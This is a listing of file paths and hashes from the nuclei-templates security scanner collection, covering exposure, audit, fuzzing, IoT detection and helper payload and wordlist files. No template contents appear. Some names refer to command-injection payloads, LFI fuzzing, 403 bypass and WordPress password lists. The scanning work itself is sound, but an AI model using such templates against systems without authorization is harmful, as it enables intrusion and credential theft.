+nuclei-templates/exposures/files/gogs-install-exposure.yaml:7515e4b1039f99185f6799b522dab1a86fee63f0 +nuclei-templates/exposures/files/google-api-private-key.yaml:0423ed652b6eb25d6533a6a13b16dcddc7ff7542 +nuclei-templates/exposures/files/google-services-json.yaml:f5e650c309e46082bf42e8d977de94827f0bd912 +nuclei-templates/exposures/files/iceflow-vpn-disclosure.yaml:9df005b38920e3819d3ace7f688dc42e5ce19ee5 +nuclei-templates/exposures/files/idea-folder-exposure.yaml:f9f0fe1700bf99db55f1ca06f04392e24d38996d +nuclei-templates/exposures/files/ioncube-loader-wizard.yaml:cbe74879cbe7829c76414b6d32d66b5261191392 +nuclei-templates/exposures/files/jetbrains-webservers.yaml:488c2c061d51d9b1635fc8d5da2796f485af56f1 +nuclei-templates/exposures/files/joomla-file-listing.yaml:07fe5dcde2c6f4a1eb6ea0219d8b4e3b10d85d26 +nuclei-templates/exposures/files/jsapi-ticket-json.yaml:fae55ba0d1b13edeb9a248d5d2e6a1a96c6f999f +nuclei-templates/exposures/files/keycloak-json.yaml:a05400611d04443fdde2e4edd42974d31aa22252 +nuclei-templates/exposures/files/lazy-file.yaml:03dd93e46597d09a366a8e7e11d4d5baf20727ab +nuclei-templates/exposures/files/npm-anonymous-cli.yaml:2b57b64b4578ec920075948cfce5a27eb078397b +nuclei-templates/exposures/files/npm-cli-metrics-json.yaml:89c2424fb809725e02d33fd1296bc71223d49ffb +nuclei-templates/exposures/files/npm-shrinkwrap-exposure.yaml:c3ce92f045e15133ae28d0e68265724f5ba5593a +nuclei-templates/exposures/files/npmrc-authtoken.yaml:248afdd32f5937f56f18e0c3e5050dc687078ab0 +nuclei-templates/exposures/files/nuget-package-config.yaml:d57d7705e0d0c871b6aa4866d96a8f7818a5ab9a +nuclei-templates/exposures/files/oauth-credentials-json.yaml:ac0460325d4ec7db0aa0c53d18105f355403a215 +nuclei-templates/exposures/files/openstack-user-secrets.yaml:482cc0f684c432c2adc0baf03ca69298c60232be +nuclei-templates/exposures/files/oracle-test-cgi.yaml:e223dd076f345e9ebc4017300831fa2ae76fee1e +nuclei-templates/exposures/files/pantheon-upstream.yaml:7f5f9de9222b7a8e91a983c1aa25e96aa037fe15 +nuclei-templates/exposures/files/php-ini.yaml:a8cff5e45eca228900f9b9bfcc9eb7857150f1c8 +nuclei-templates/exposures/files/php-user-ini-disclosure.yaml:3319316bdbad95fbce56a9ee884b29e3dbfd18ee +nuclei-templates/exposures/files/phpunit-result-cache-exposure.yaml:51ec0faf735c43f7469db3d8e120c89dcc161dbd +nuclei-templates/exposures/files/phpunit.yaml:9bc99f57a516840c44f77d8824c2daaca7b369f1 +nuclei-templates/exposures/files/pipeline-configuration.yaml:879a8778c6900d766424280ba78b556bf54f826b +nuclei-templates/exposures/files/pipfile-lock.yaml:e0ada9ef8211c01a59c8b059282c2a96ccb6aa8c +nuclei-templates/exposures/files/putty-private-key-disclosure.yaml:2829c7f59d8db9753c96b89a585fd51f8f7a4d31 +nuclei-templates/exposures/files/pyproject-disclosure.yaml:a3f98d88614c14b2f6131fcce3427bd01ef8c74c +nuclei-templates/exposures/files/rails-secret-token-disclosure.yaml:e473876f3e332d7517517239cf6ccb1f01573cfc +nuclei-templates/exposures/files/readme-md.yaml:1c4e62cd38591302e225f45ffbe2a35947ceefea +nuclei-templates/exposures/files/redmine-config.yaml:5fd5aae57b0f8df6de5f72a5ae4f5dc0f70252d5 +nuclei-templates/exposures/files/redmine-settings.yaml:204c7294581e481809b9fb67750a4d831aedf543 +nuclei-templates/exposures/files/ruby-rail-storage.yaml:308c2e80f987f0ea0781f0e26e185a2b221eecf1 +nuclei-templates/exposures/files/sass-lint.yaml:9f04dc128c23af16bf2155a2e141a00109bc870e +nuclei-templates/exposures/files/secret-token-rb.yaml:ba55f47b851fd03be7a2cd6e3b924fe437150ebb +nuclei-templates/exposures/files/secrets-file.yaml:b4449035c4753a8eab06d83e8331dd3aaf3ce13a +nuclei-templates/exposures/files/sendgrid-env.yaml:dca1621b513530b107337009ec2e36a11e753974 +nuclei-templates/exposures/files/sensitive-storage-exposure.yaml:2f1593fdde4647242d0a43bde05e3649296eb7c0 +nuclei-templates/exposures/files/service-account-credentials.yaml:988515a304a4f25d050f84c23d2d5f2194bb5c42 +nuclei-templates/exposures/files/shellscripts.yaml:a71d766c54f97a6be34691fdd318027e0a7c4838 +nuclei-templates/exposures/files/snyk-ignore-file-disclosure.yaml:68a8d2a55ec9ba6d16ea35c327ec607bbd9225ef +nuclei-templates/exposures/files/styleci-yml-disclosure.yaml:1dd595c1ee9e2aec8704e9a9b1ed012bedc18068 +nuclei-templates/exposures/files/symfony-properties-ini.yaml:19e89ceb87835b0df9e53a2d1ce27ac7a4150a92 +nuclei-templates/exposures/files/symfony-security.yaml:4a3d29a0561e07d1991459f03ff983329547bcbc +nuclei-templates/exposures/files/thumbs-db-disclosure.yaml:e597a6bbb2867962fb49bc7c50c336d263eeee77 +nuclei-templates/exposures/files/token-info-json.yaml:7f46cf9d563ea250c8ae20c4cec6f3f967a850df +nuclei-templates/exposures/files/token-json.yaml:c8de9a360f0772ce7c8fb0182e2de9fb47e6d9fd +nuclei-templates/exposures/files/travis-ci-disclosure.yaml:fb7460e9ae1f6b5aecb409a0fea95a4bbb7f8fe3 +nuclei-templates/exposures/files/uwsgi-ini.yaml:0b8eae3d0242e85684f288911fb745190f377a3e +nuclei-templates/exposures/files/vagrantfile-exposure.yaml:aa09f000826ffe0fc4c60e988edacf59f3e9fd34 +nuclei-templates/exposures/files/vscode-sftp.yaml:d3dfa13b8b69862e9838e293d08578cf24b05e56 +nuclei-templates/exposures/files/webpack-mix-js.yaml:7f87167c707c2a2a3563007f1b8c7626d6495093 +nuclei-templates/exposures/files/webpack-sourcemap-disclosure.yaml:bda152f4d63e86b6441abacde9330f744f5c0f49 +nuclei-templates/exposures/files/wget-hsts-list-exposure.yaml:38f1a1b0074e35ddd18e32e8a1c8b6e18a6874b1 +nuclei-templates/exposures/files/wordpress-readme-file.yaml:acbcafeb72c989540d3f7268aa1a0bf0b10ea68e +nuclei-templates/exposures/files/wp-cli-exposure.yaml:7de8ab5690f9549334146034b1ef7ecfa510de97 +nuclei-templates/exposures/files/ws-ftp-ini.yaml:41629efddc41ee876e1cac34ab3345e643cf4e34 +nuclei-templates/exposures/files/xampp-environment-variables.yaml:d2505dbc24ffe3bd9e524b7db9ce00dc9a5b149f +nuclei-templates/exposures/files/yarn-lock.yaml:9f5a4e10e560c2150b6242d676e5584ba032ccd5 +nuclei-templates/exposures/logs/access-log.yaml:4275eeaab9783fe8e7e7792ee5a1478f56eb259b +nuclei-templates/exposures/logs/clockwork-php-page.yaml:5bf1b65f7815ee73a9d682f749df8d3d9052a072 +nuclei-templates/exposures/logs/darkstat-detect.yaml:52ef155dbe73e338ecf3aa4e9771e37ca18812bb +nuclei-templates/exposures/logs/development-logs.yaml:2a4450123066800814d63657b5f30f451a556665 +nuclei-templates/exposures/logs/django-debug-exposure.yaml:66aa0344a8cccc144dd5e8c513ed2b2324af147e +nuclei-templates/exposures/logs/elmah-log-file.yaml:eaa6bc8a8a8879d74d17c0fd4ed05755a72742ca +nuclei-templates/exposures/logs/error-logs.yaml:76b2b73531ff6cc0e008e63a2fd11b04100b3cd0 +nuclei-templates/exposures/logs/event-debug-server-status.yaml:e2e5224ab238d85a2015726acc7e4c9919fdfeb9 +nuclei-templates/exposures/logs/exposed-glances-api.yaml:9030493bbbb5a25c96abbdeccdd8f76ffe5758fc +nuclei-templates/exposures/logs/fastcgi-echo.yaml:6eb177b8180cdc434fd69b448f2ace6c57662d22 +nuclei-templates/exposures/logs/ffserver-status.yaml:1e033f514952d467aba0ccfc0749cc23cfe52c5b +nuclei-templates/exposures/logs/git-exposure.yaml:0ed5b001132f3c04698f0be2fe7f0d4e7d45ce6a +nuclei-templates/exposures/logs/git-logs-exposure.yaml:76bedc0483d859b8559228c9c04b643cdc40d099 +nuclei-templates/exposures/logs/idea-logs-exposure.yaml:24f1c9840d13329dffff9f9b1d646ba142af5a6f +nuclei-templates/exposures/logs/jboss-seam-debug-page.yaml:93e575f2d58795c5d53b14843cc3ecec00a53dfb +nuclei-templates/exposures/logs/laravel-log-file.yaml:c197522a753f6469d158b030135e19f6be8f209c +nuclei-templates/exposures/logs/laravel-telescope.yaml:5009103f45d8ee8875416f6d494f061d4520cc90 +nuclei-templates/exposures/logs/lucee-stack-trace.yaml:c63d4ff66167bc6335dbad5836220e2cd93d15ab +nuclei-templates/exposures/logs/npm-log-file.yaml:31ba86b531109dc220ad1a1c966a158b3629f2e3 +nuclei-templates/exposures/logs/oracle-ebs-sqllog-disclosure.yaml:0afb731d21b1dd9712a8500fc8c6d98709ec1f3c +nuclei-templates/exposures/logs/php-debug-bar.yaml:2b23535e67e555bf42f5c638ba5ed4bc3cedeb3a +nuclei-templates/exposures/logs/production-logs.yaml:0a54f495eaf4bab89206b12a0d4bedaeeac0e2d3 +nuclei-templates/exposures/logs/pyramid-debug-toolbar.yaml:55265b72893e53b6e751038f78c9f7395e9d205b +nuclei-templates/exposures/logs/rails-debug-mode.yaml:70df8abd8d55710ab5eda681b53ce8aecfe09d63 +nuclei-templates/exposures/logs/redis-exception-error.yaml:b4e01ee0cafce54c4307cf82d0e39e9877dd74c5 +nuclei-templates/exposures/logs/roundcube-log-disclosure.yaml:0008bb4dfdc3687e09a343692322e57655087a74 +nuclei-templates/exposures/logs/squid-analysis-report-generator.yaml:b93c3b660eebab90eec05870afa7959b35cc3a30 +nuclei-templates/exposures/logs/struts-debug-mode.yaml:9a41c363ef3d9db0fa761b05501d775ffa948f29 +nuclei-templates/exposures/logs/struts-problem-report.yaml:2e778f252d3f0b548588d78fe3ae4f83e3af4d7b +nuclei-templates/exposures/logs/trace-axd-detect.yaml:4908b110ae4f5b00ab1bac17c3a1470c8455dcbb +nuclei-templates/exposures/logs/webalizer-xtended-stats.yaml:bf99d2e062f5106fe29c43115bed5f3fa4e35e13 +nuclei-templates/exposures/logs/wp-app-log.yaml:bbdc2a804b33d3d13f254cdf1d3cee8348053c80 +nuclei-templates/exposures/logs/zm-system-log-detect.yaml:6232b732c3b00016f88d432f550a8bc311a3d7dc +nuclei-templates/exposures/tokens/amazon/amazon-mws-auth-token.yaml:87c41fde3dc7b9b30c7a5b7c3d17b80a76cc70d7 +nuclei-templates/exposures/tokens/amazon/amazon-sns-topic.yaml:82e69a61beab780d371dbc9dc78205f7ba713c48 +nuclei-templates/exposures/tokens/amazon/aws-access-key-value.yaml:5855034a7911820827443eb0bfd52f8df1d3fff5 +nuclei-templates/exposures/tokens/artifactory/artifactory-api-password.yaml:d33424162219b1e38ed3db37c21352004fd1be84 +nuclei-templates/exposures/tokens/artifactory/artifactory-api-token.yaml:208207ebff0e2c399dd3bda62f6e721a9ac459cd +nuclei-templates/exposures/tokens/azure/azure-apim-secretkey.yaml:efe38a6d958d406eb40f32eab73b2326cf07ac91 +nuclei-templates/exposures/tokens/bitly/bitly-secret-key.yaml:420e4c90d1de6e1c0784f696d212bc734106e2f0 +nuclei-templates/exposures/tokens/cloudinary/cloudinary-credentials.yaml:60aa9b81e9d6faa45ac8e47126bf5045ac07a718 +nuclei-templates/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml:411988ee5a840aee158196d2ff9783ea4325de94 +nuclei-templates/exposures/tokens/digitalocean/tugboat-config-exposure.yaml:e00a496199dfb0c192969cfe42c28e93514c09aa +nuclei-templates/exposures/tokens/discord/discord-webhook.yaml:b36fa21c1e2d0ff65b254934c507cc5c78149711 +nuclei-templates/exposures/tokens/docker/dockercfg-config.yaml:ac7731eae78916b31c47625c93fac3a6ce0b54f4 +nuclei-templates/exposures/tokens/generic/credentials-disclosure.yaml:a6d3bfefd18749320d97d65b601775b4b6fa0037 +nuclei-templates/exposures/tokens/generic/general-tokens.yaml:ffe8c6b6526aecfa0b5f1631b7e83c5df91fe970 +nuclei-templates/exposures/tokens/generic/jdbc-connection-string.yaml:421292385da649ef2e5ac71dd2c7b8533006f4ac +nuclei-templates/exposures/tokens/generic/jwt-token.yaml:fcbfbb5485574bb15e651e536b1bc63ce7eb775f +nuclei-templates/exposures/tokens/generic/shoppable-token.yaml:9d63ecea7ad79f308a79940fd686699ad7df61cc +nuclei-templates/exposures/tokens/google/fcm-server-key.yaml:c2e5ad6ad4124167e461ca616804c7e8993139ae +nuclei-templates/exposures/tokens/google/google-api-key.yaml:15d76b70b797cc02d956f28ac5791da81d9867d7 +nuclei-templates/exposures/tokens/google/google-calendar-link.yaml:9ef79ba541fd99f0c7de1b18093e2bbeeab773ef +nuclei-templates/exposures/tokens/google/oauth-access-key.yaml:f200c4c2416c142ba469eb7997c6c02eb83a4ea3 +nuclei-templates/exposures/tokens/loqate/loqate-api-key.yaml:e4cc6c478cc75c3a22e58069aca30b2eab1e952f +nuclei-templates/exposures/tokens/mailchimp/mailchimp-api-key.yaml:2c88d13e8862dee890debc1ef4f27ec2520aad13 +nuclei-templates/exposures/tokens/microsoft/microsoft-teams-webhook.yaml:977356fcb294cff2cb290a3cb8aeec7fb50cead7 +nuclei-templates/exposures/tokens/newrelic/newrelic-admin-api-key.yaml:ea4ba587c7831a535c0e34131ea9d71f27ebd2b6 +nuclei-templates/exposures/tokens/newrelic/newrelic-insights-key.yaml:9138d7184a0e94eecc76a66f3f2d71bee9aa0a44 +nuclei-templates/exposures/tokens/newrelic/newrelic-rest-api-key.yaml:e803c1034e81927b66f9f86800332382065d5561 +nuclei-templates/exposures/tokens/newrelic/newrelic-synthetics-location-key.yaml:1ae3096e475dd6122533781bf2698060510dffbd +nuclei-templates/exposures/tokens/nextjs/cipher-secret-key.yaml:ef0dda31ad0243874210b7d098dff58308e9100f +nuclei-templates/exposures/tokens/paypal/braintree-access-token.yaml:739ce7c9b8e0df1f1c46f1344af6abc909e96f56 +nuclei-templates/exposures/tokens/picatic/picatic-api-key.yaml:362b74c208524577448189f1370fadc51f8de7a4 +nuclei-templates/exposures/tokens/sendgrid/sendgrid-api-key.yaml:96e081fe15d0c1090ed8b01b3a274317c1d64448 +nuclei-templates/exposures/tokens/slack/slack-bot-token.yaml:17c1da59d4d13c37b31d6f7a2a20261cfe7427fa +nuclei-templates/exposures/tokens/slack/slack-user-token.yaml:4e4a140a2051f63fe95dd32baa5e6bae70211fd3 +nuclei-templates/exposures/tokens/slack/slack-webhook-token.yaml:abeb695cd118b6f33616ff7689cac5f454de6edb +nuclei-templates/exposures/tokens/sonarqube/sonarqube-token.yaml:5c8683aea65456e713ac6540adad59797ca5e2d0 +nuclei-templates/exposures/tokens/stripe/stripe-restricted-key.yaml:3bd4d5a8ac154449dc09a66e50945c650026e7e3 +nuclei-templates/exposures/tokens/stripe/stripe-secret-key.yaml:78d4ec79060ef6769e30788ce19350521a6fe0cd +nuclei-templates/exposures/tokens/zapier/zapier-webhook-token.yaml:36061766226b84b57f9b4a78fd0d6fa3ab1e7cd6 +nuclei-templates/exposures/tokens/zoho/zoho-webhook-token.yaml:5b9421ad93c0cb7c04e82223c83a6ece2f5c0052 +nuclei-templates/file/android/adb-backup-enabled.yaml:a8cfed2c07ecff061bfbc60a61ba20c9d4a08eb2 +nuclei-templates/file/android/biometric-detect.yaml:390458adc0d25cf76f0f1d533d5c58af9dbd1bc5 +nuclei-templates/file/android/certificate-validation.yaml:607d9ba229e7868e97a0172c37209b8b234b6625 +nuclei-templates/file/android/content-scheme.yaml:5d14d3691d2b997beb22d15a10fd7d14ce3d6999 +nuclei-templates/file/android/debug-enabled.yaml:209dd2b56610e582ce72054f105715064ff78bad +nuclei-templates/file/android/dynamic-broadcast-receiver.yaml:0c138e576e003fd3a9980192920efc9baff35bbe +nuclei-templates/file/android/file-scheme.yaml:7ec4757b1673378738863a8552c490418ed69cb0 +nuclei-templates/file/android/provider-path.yaml:900bd65305c4987c88146a5d2d5f00766727e06e +nuclei-templates/file/android/webview-addjavascript-interface.yaml:5cafbbbefd748999e7b9d31e9eed55a57afc972a +nuclei-templates/file/android/webview-javascript.yaml:929f48677c680d44c643c486b775acf5e5c39388 +nuclei-templates/file/android/webview-load-url.yaml:cf892abfaa80f29a70436522f289d5eb3053980f +nuclei-templates/file/android/webview-universal-access.yaml:96d1dc919754acd27a3f6dc55ed577e47655d611 +nuclei-templates/file/audit/cisco/configure-aaa-service.yaml:cdc9316dc2109540ad0879d5df8d2e8f8037761d +nuclei-templates/file/audit/cisco/configure-service-timestamps-debug.yaml:010a0edc9cd2d3d8cc05e097eda29dc7d34fc1ee +nuclei-templates/file/audit/cisco/configure-service-timestamps-logmessages.yaml:cdd1b50700bf1b18d7d0537eebeec4e2c49fc3a1 +nuclei-templates/file/audit/cisco/disable-ip-source-route.yaml:0b21ccd4061883dfa3bfcbd8499500b65e77e7b7 +nuclei-templates/file/audit/cisco/disable-pad-service.yaml:20dc2f85feb3de4784ad37d691b3c44568e5f0fa +nuclei-templates/file/audit/cisco/enable-secret-for-password-user-and-.yaml:8a762f83c78a6f11a39d1b16db438d15c1a9e45b +nuclei-templates/file/audit/cisco/logging-enable.yaml:445e1f6a00d86528c1e935a6360f6002ccfe836c +nuclei-templates/file/audit/cisco/set-and-secure-passwords.yaml:18595b1d2f6a0b021f07e723248ed5cf87a1ad69 +nuclei-templates/file/audit/fortigate/auto-usb-install.yaml:53bab09ce952ae9806a5781ab5947833f4bb7dce +nuclei-templates/file/audit/fortigate/heuristic-scan.yaml:eb19d931f8a86e92de4fbfdf1df5bfccab973213 +nuclei-templates/file/audit/fortigate/inactivity-timeout.yaml:674791fadb2f4d93f1af73ed871ba7070a9ae86c +nuclei-templates/file/audit/fortigate/maintainer-account.yaml:29f3fc4f50e27cbd15ccebf71cd77f0f9086cb82 +nuclei-templates/file/audit/fortigate/password-policy.yaml:ae2f75996280398b1cf7851116d14d23bd44ca25 +nuclei-templates/file/audit/fortigate/remote-auth-timeout.yaml:ee9d0d07c786269ef84ddb9ba596578fcbdec8da +nuclei-templates/file/audit/fortigate/scp-admin.yaml:6f34acdd21a213ab5b05a2acf5043f7d09da4ce0 +nuclei-templates/file/audit/fortigate/strong-ciphers.yaml:e772983e4f92469e234c2a91ffb1dc547f89e22b +nuclei-templates/file/bash/bash-scanner.yaml:0554c596cfcb58910d3044b4451869068944d793 +nuclei-templates/file/electron/electron-version-detect.yaml:8021ce0b863fc7090d0b13a29b97bf8ef1a208b0 +nuclei-templates/file/electron/node-integration-enabled.yaml:3de6b8cc228cb5cb4d806317982aeebb49d0c4b7 +nuclei-templates/file/keys/amazon/amazon-mws-auth-token.yaml:714c2eafbc61cdae9d451bcb37cb9e04c927770c +nuclei-templates/file/keys/amazon/amazon-sns-token.yaml:34135d8c2e049f4c6441c339e9444711f0997c36 +nuclei-templates/file/keys/amazon/aws-access-id.yaml:2e1022a735febe80d44b71837a35a4afad0ca525 +nuclei-templates/file/keys/amazon/aws-cognito.yaml:7ef8a95dec1248da6ed314cf33dac219f477e45f +nuclei-templates/file/keys/branch-key.yaml:5378baf1bc66078a1cd36aab840424a14495e149 +nuclei-templates/file/keys/cloudinary.yaml:f04384e4f360895e73718aae4c580f65b5ebdc32 +nuclei-templates/file/keys/credential-exposure.yaml:9ff02f6a772c32226775057cea55b961dd38b293 +nuclei-templates/file/keys/credentials.yaml:11f3d4e8623b2dcdeb565bac29ffb113a14b8014 +nuclei-templates/file/keys/dynatrace-token.yaml:3052a2375f053a715f8280c30507f70438a66ecd +nuclei-templates/file/keys/facebook-client-id.yaml:4020b932d3166489f448a0ad3babcf6f38843339 +nuclei-templates/file/keys/facebook-secret.yaml:4920a003ff197e1cc1a409c5c5faf5127fa603d1 +nuclei-templates/file/keys/firebase-database.yaml:d187e6fb3365bc68dad4e64871825154805361ba +nuclei-templates/file/keys/gcp-service-account.yaml:ccf3568c6744fccf2371ac8bfd555526bfb13e20 +nuclei-templates/file/keys/github/github-app-token.yaml:68a995e2ac399418ebe9e9e66bdef9140994bdb8 +nuclei-templates/file/keys/github/github-oauth-token.yaml:2610a79ccc3bf1ca982f2a673b9fdb00a2742f8f +nuclei-templates/file/keys/github/github-personal-token.yaml:e08c2e89e4dc6ca17ea3cc0459a7e37f55542f9f +nuclei-templates/file/keys/github/github-refresh-token.yaml:fbf1308c1272f4e29830e7dde624c4ed0bdfd6fd +nuclei-templates/file/keys/github-recovery-code.yaml:bc5239297c5b8f3b2741478f3501703134eaa63c +nuclei-templates/file/keys/google-api.yaml:b1a45d973f28663b184704ccc5a08b38ae6f4625 +nuclei-templates/file/keys/linkedin-id.yaml:0b948ed87d6f77f610bc34157621824b7f783cf8 +nuclei-templates/file/keys/mailchimp-api.yaml:23710637c6f9e73a10eb0fe84f7ebe1b2bc36c94 +nuclei-templates/file/keys/mailgun-api.yaml:7e7c2baf26d65958dd3cd59bee9569f4f89e36b3 +nuclei-templates/file/keys/paypal-braintree-token.yaml:a08c502c502936044187c9a9d6d9c2aec9b9d60c +nuclei-templates/file/keys/pictatic-api-key.yaml:281d6ef792d8f776a9b4cb96f5b77ab13cad6f90 +nuclei-templates/file/keys/private-key.yaml:c7d709816fee0382c0250b2da2bb99ce6588c836 +nuclei-templates/file/keys/s3-bucket.yaml:9d725525020d19b183553ee8f097e54ef4e082cd +nuclei-templates/file/keys/sendgrid-api.yaml:0dfbd1ae46def32a64b82e5273c73990a9e20401 +nuclei-templates/file/keys/shopify-custom-token.yaml:ab332a7a67468bf0784bb12cc21a7ede6025736c +nuclei-templates/file/keys/shopify-private-token.yaml:700ea59fd3f7a5f955757e6d5cebe22a05847091 +nuclei-templates/file/keys/shopify-shared-secret.yaml:b5e51fb3e30450347ef8db2087363d6276e12e76 +nuclei-templates/file/keys/shopify-token.yaml:7d7faf45836a7e6288fbe623d1c3455730d95acf +nuclei-templates/file/keys/slack-api.yaml:cbcf3b1cc032051c69bdffbc983bc0af754ebd2d +nuclei-templates/file/keys/slack-webhook.yaml:a523fa27b1ecf24122c571c5a3c9327dc2ab30e8 +nuclei-templates/file/keys/square-access-token.yaml:b46a9e939c03f7a4a2254ca28e35233d33fab68a +nuclei-templates/file/keys/square-oauth-secret.yaml:90f91689ab5ce90259d6e84a748648ae5cb4b5f9 +nuclei-templates/file/keys/stripe-api-key.yaml:a8849a29190fd1fb92a50e9e0a6c49ea694043a9 +nuclei-templates/file/keys/twilio-api.yaml:5ea16764819395bcfe307964c1b32a4dea86bb13 +nuclei-templates/file/keys/twitter-secret.yaml:fa82d681ae94b741b25786f58835c9be605d8592 +nuclei-templates/file/logs/django-framework-exceptions.yaml:bfe8762092b34fbe7c57d1d4f18116be8502ec58 +nuclei-templates/file/logs/python-app-sql-exceptions.yaml:f9bc92aea698954c325c8073098c7abc78549066 +nuclei-templates/file/logs/ruby-on-rails-framework-exceptions.yaml:4cacd8d7144f8353b5927cac2d008c1d08bb3a50 +nuclei-templates/file/logs/spring-framework-exceptions.yaml:59912aa3db6ff6d29783c9b4fd84a6dc4d8369f3 +nuclei-templates/file/logs/suspicious-sql-error-messages.yaml:c499762b275c19fccf3879788e4603dd056112c8 +nuclei-templates/file/perl/perl-scanner.yaml:ca5cfa3bae68e00b77dc73989a6331995be0b54a +nuclei-templates/file/php/php-scanner.yaml:bc0232813f7fcf4ea23d20cb004ee2f992cc6745 +nuclei-templates/file/python/python-scanner.yaml:3774742345a3c2db504ab69a5a4f2e2584bb5ed3 +nuclei-templates/file/xss/dom-xss.yaml:e43d8068f2bd1a7d2af72dac9974e57de29879c4 +nuclei-templates/fuzzing/adminer-panel-fuzz.yaml:10e64f6e0e38ff6a928da2a3dcb4ed6ada11077c +nuclei-templates/fuzzing/cache-poisoning-fuzz.yaml:4b778dc47192f4021c437b4977f4c1024714c25d +nuclei-templates/fuzzing/header-command-injection.yaml:2fb0c50fab489599f018fa4811998cfad6aedcd0 +nuclei-templates/fuzzing/iis-shortname.yaml:49aa0115e6816e039d7f840da4cc4de641212b54 +nuclei-templates/fuzzing/linux-lfi-fuzzing.yaml:fd93c76061db341697c4979cf4caba4442cefbdc +nuclei-templates/fuzzing/mdb-database-file.yaml:af6f67860c2afbb36f6d76b52c1dde2aca0f540b +nuclei-templates/fuzzing/prestashop-module-fuzz.yaml:196805042f7bf35c4fc41ec7f926cdb7c18fa1f8 +nuclei-templates/fuzzing/valid-gmail-check.yaml:5e1296c5ad87ede1709cdd2ccffe286052737f50 +nuclei-templates/fuzzing/wordpress-plugins-detect.yaml:ea204823b42c876e70dd316600e2081e788d9993 +nuclei-templates/fuzzing/wordpress-themes-detect.yaml:1631180b1db4c3bce93cef7434e03249ea2673af +nuclei-templates/fuzzing/wordpress-weak-credentials.yaml:fe3c3b58246e5dc90ff2b9e116f5434da9faf9c0 +nuclei-templates/fuzzing/xff-403-bypass.yaml:0cac7be1d164d52ac03aa3e5865f682da88a2c51 +nuclei-templates/headless/dvwa-headless-automatic-login.yaml:99a6c2734ab061798627d79fda8ee538aa6060a8 +nuclei-templates/headless/extract-urls.yaml:c2ff7a092991c2dee191e84ba4129270aacc8914 +nuclei-templates/headless/postmessage-outgoing-tracker.yaml:38d7ea38b0521a7ee3cf78db660b5ae923d1a54e +nuclei-templates/headless/postmessage-tracker.yaml:bf39bc73b73f1bf0636383612db9fce761356c5e +nuclei-templates/headless/prototype-pollution-check.yaml:5337a408ccfd5aa40469f3e8d1aecf801ff83fd9 +nuclei-templates/headless/screenshot.yaml:e5974e7df189bf88de632531dea548671c16b608 +nuclei-templates/headless/window-name-domxss.yaml:a72a04f1d69f180e284e3a9fb68d1baa6eeaab4a +nuclei-templates/helpers/payloads/CVE-2020-5776.csv:bb017fe08ae985c23145f7b69aab97cdffbbd8aa +nuclei-templates/helpers/payloads/command-injection.txt:409a63a78f9f5a463437042971912fa06e4135bd +nuclei-templates/helpers/payloads/request-headers.txt:b85d7c53290237323b5374416fbec07237941aa9 +nuclei-templates/helpers/wordlists/adminer-paths.txt:2ac24141ad5f28203b9ca35719bd51f39381aa36 +nuclei-templates/helpers/wordlists/grafana-plugins.txt:7496b3121100f358e8784a50229eb9fc9f8a00b1 +nuclei-templates/helpers/wordlists/headers.txt:2effcf74fe0332b242c98df1f50f774c556746d6 +nuclei-templates/helpers/wordlists/mdb-paths.txt:c380943cfa8a337ccb1ea38062e2856924960f1a +nuclei-templates/helpers/wordlists/numbers.txt:8084f0f10255c5e26605a1cb1f51c5e53f92df40 +nuclei-templates/helpers/wordlists/prestashop-modules.txt:ae73ac19d088b28a943e8a9ce98ab4461e4dc029 +nuclei-templates/helpers/wordlists/user-list.txt:0a02b5896b67f5ed213b6d8bc051c79cd1b9457a +nuclei-templates/helpers/wordlists/wordpress-plugins.txt:ba0965ea3fd08a41584553c8b4e9a40eb8781710 +nuclei-templates/helpers/wordlists/wordpress-themes.txt:6d116f798f0ef3f9be194eb79ff65777b31b5b18 +nuclei-templates/helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56 +nuclei-templates/helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b +nuclei-templates/iot/apc-ups-login.yaml:3dda6c8d87e66fa17e92b29d575dd7c01f3d668c +nuclei-templates/iot/automation-direct.yaml:2038470a9f984fc83c0e44b70c41d8e3674e9df9 +nuclei-templates/iot/brother-printer-detect.yaml:c185e23f699ae5398e9d6882bd6b500db94abd36 +nuclei-templates/iot/brother-unauthorized-access.yaml:6e302f0b88a871697812f513b62d3d8ca469c00d +nuclei-templates/iot/codian-mcu-login.yaml:e65d930787965308859d29d1770d8a07471eac97 +nuclei-templates/iot/contacam.yaml:42683a4f6c13ec5d2281897770f0713b4f91af65 +nuclei-templates/iot/envision-gateway.yaml:4bfad66d2c3bbfb84c6be6ce3e5a83cdda93a544 +nuclei-templates/iot/epmp-login.yaml:4269a83d4ea47f7008bd87bfda6ab6822885dce8 +nuclei-templates/iot/epson-wf-series.yaml:7b4935d79270dd25ce9f9a9cf9c4d219f9899c3b +nuclei-templates/iot/grandstream-device-configuration.yaml:5fe18e2e3abb04c4578c94d5fc3ab892bb6546b7 +nuclei-templates/iot/heatmiser-wifi-thermostat.yaml:6bb152aaa5ef1cca6a3869b124c4b361095700eb +nuclei-templates/iot/honeywell-building-control.yaml:ef53654bf2902af777fe1acda6ecf6b0557edf7e +nuclei-templates/iot/hp-color-laserjet-detect.yaml:dfad7817005209a3780713062700887be3b94bff +nuclei-templates/iot/hp-device-info-detect.yaml:fd8c4c5d1c0c9ca4857805e8d6528620a71b0331 +nuclei-templates/iot/hp-laserjet-detect.yaml:90fa9512dfdf9e70dc8bb4a9bcbe6343d3d92dfa +nuclei-templates/iot/huawei-home-gateway.yaml:62ba051604489a8aaaadce55bada7396f21cc55a +nuclei-templates/iot/internet-service.yaml:1056afb10f8fca694c7868ef6b9264cbeb72e33f +nuclei-templates/iot/iotawatt-app-exposure.yaml:240c944e6e97fa334c8b90a349cfc17e0a08423d +nuclei-templates/iot/kevinlab-device-detect.yaml:a0914260b1ce915a4f5b9cf672e9dfa1eea4f244 +nuclei-templates/iot/liveview-axis-camera.yaml:a6326909170b467260641c5b8a8d59e38bf25b7d +nuclei-templates/iot/lutron-iot-default-login.yaml:020ebdca10278e31377e224cd4e830f836210a73 +nuclei-templates/iot/mobotix-guest-camera.yaml:2e02a989b29302375227dc709bba3977901dfeec +nuclei-templates/iot/netsurveillance-web.yaml:34e770bd3ccbf8adfd371291ddc2296981016f80 +nuclei-templates/iot/network-camera-detect.yaml:42b4ef01008f00d83e7815ac0f07e3582b6e8388 +nuclei-templates/iot/novus-ip-camera.yaml:3e7238977ba2cc7b028f25d5433dcf0266f90bec 